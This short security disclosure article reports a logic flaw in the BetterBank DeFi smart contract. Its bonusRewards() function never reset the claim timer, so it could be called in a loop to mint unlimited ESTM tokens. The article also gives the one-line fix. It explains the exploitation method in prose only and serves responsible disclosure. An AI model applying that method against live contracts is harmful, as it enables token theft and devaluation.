A critical vulnerability was discovered within the smart contract of the BetterBank DeFi protocol by Kaspersky security researcher Georgy Zaytsev. The flaw, identified during a manual code review, resided in the reward distribution logic for the platform’s native ESTM token, creating a mechanism for unlimited token generation.

The Flaw in the Bonus Reward Function

The BetterBank protocol features two primary functions for reward distribution: claimRewards() and bonusRewards(). The bonusRewards() function was designed to grant users an additional 10% bonus on their rewards if they were claimed more than 24 hours after the previous claim. To enforce this time-lock, the contract used a variable named lastRewardClaimTime.

The vulnerability stemmed from a critical oversight in the code. While the primary claimRewards() function correctly updated the lastRewardClaimTime variable after a successful claim, the bonusRewards() function did not. This omission meant that claiming a bonus did not reset the 24-hour cooldown timer, allowing the function to be called again without delay.

Exploitation and Resolution

An attacker could exploit this logic error by repeatedly calling the bonusRewards() function in a loop within a single transaction. Each call would grant the 10% bonus without updating the lastRewardClaimTime, enabling the attacker to mint an unlimited number of ESTM tokens. This uncontrolled minting would have led to the severe devaluation of the ESTM token.

Upon discovering the flaw, Kaspersky reported the issue to the BetterBank developers. The development team acknowledged the vulnerability and implemented a fix. The resolution involved adding the line lastRewardClaimTime = block.timestamp; to the bonusRewards() function. This correction ensures that the cooldown timer is properly reset after a bonus claim, mirroring the logic of the main rewards function and preventing the exploit.